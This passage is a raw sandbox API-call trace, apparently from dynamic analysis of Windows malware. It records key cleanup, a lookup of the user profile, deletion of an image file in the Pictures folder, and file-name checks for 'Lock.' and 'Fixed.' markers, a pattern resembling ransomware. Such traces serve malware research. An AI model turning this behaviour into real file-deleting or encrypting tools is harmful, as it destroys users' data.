cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab0b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.019] CryptDestroyKey (hKey=0x9e2238) returned 1 [0211.019] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.019] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.019] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.020] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.020] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.020] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.020] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.020] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.020] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0211.020] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.020] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.020] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.020] CloseHandle (hObject=0x4dc) returned 1 [0211.022] CloseHandle (hObject=0x520) returned 1 [0211.025] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.025] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.025] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/mwiYwwD-pGtpU_YSC3.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp", lpFilePart=0x8cedf4*="mwiYwwD-pGtpU_YSC3.bmp") returned 0x2f [0211.025] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mwiywwd-pgtpu_ysc3.bmp")) returned 0x20 [0211.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3af6e5f0, ftCreationTime.dwHighDateTime=0x1d5cbeb, ftLastAccessTime.dwLowDateTime=0x4a391770, ftLastAccessTime.dwHighDateTime=0x1d5cdc3, ftLastWriteTime.dwLowDateTime=0x4a391770, ftLastWriteTime.dwHighDateTime=0x1d5cdc3, nFileSizeHigh=0x0, nFileSizeLow=0x11480, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="mwiYwwD-pGtpU_YSC3.bmp", cAlternateFileName="MWIYWW~1.BMP")) returned 0x9e1eb8 [0211.025] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mwiywwd-pgtpu_ysc3.bmp")) returned 1 [0211.028] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3af6e5f0, ftCreationTime.dwHighDateTime=0x1d5cbeb, ftLastAccessTime.dwLowDateTime=0x4a391770, ftLastAccessTime.dwHighDateTime=0x1d5cdc3, ftLastWriteTime.dwLowDateTime=0x4a391770, ftLastWriteTime.dwHighDateTime=0x1d5cdc3, nFileSizeHigh=0x0, nFileSizeLow=0x11480, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="mwiYwwD-pGtpU_YSC3.bmp", cAlternateFileName="MWIYWW~1.BMP")) returned 0 [0211.028] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0211.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.028] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.029] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.029] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74cc0 [0211.031] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/mwiYwwD-pGtpU_YSC3.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp", lpFilePart=0x8cf650*="mwiYwwD-pGtpU_YSC3.bmp") returned 0x2f [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x2af0000) returned 1 [0211.031] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\mwiYwwD-pGtpU_YSC3.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mwiywwd-pgtpu_ysc3.bmp")) returned 0xffffffff [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.031] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.031] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.031] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0211.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oj8L14m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j8L14m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8L14m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L14m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ftw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tw_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0211.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6648 [0211.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oj8L14m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j8L14m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8L14m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L14m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ftw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tw_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" T.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0211.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0211.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.034] 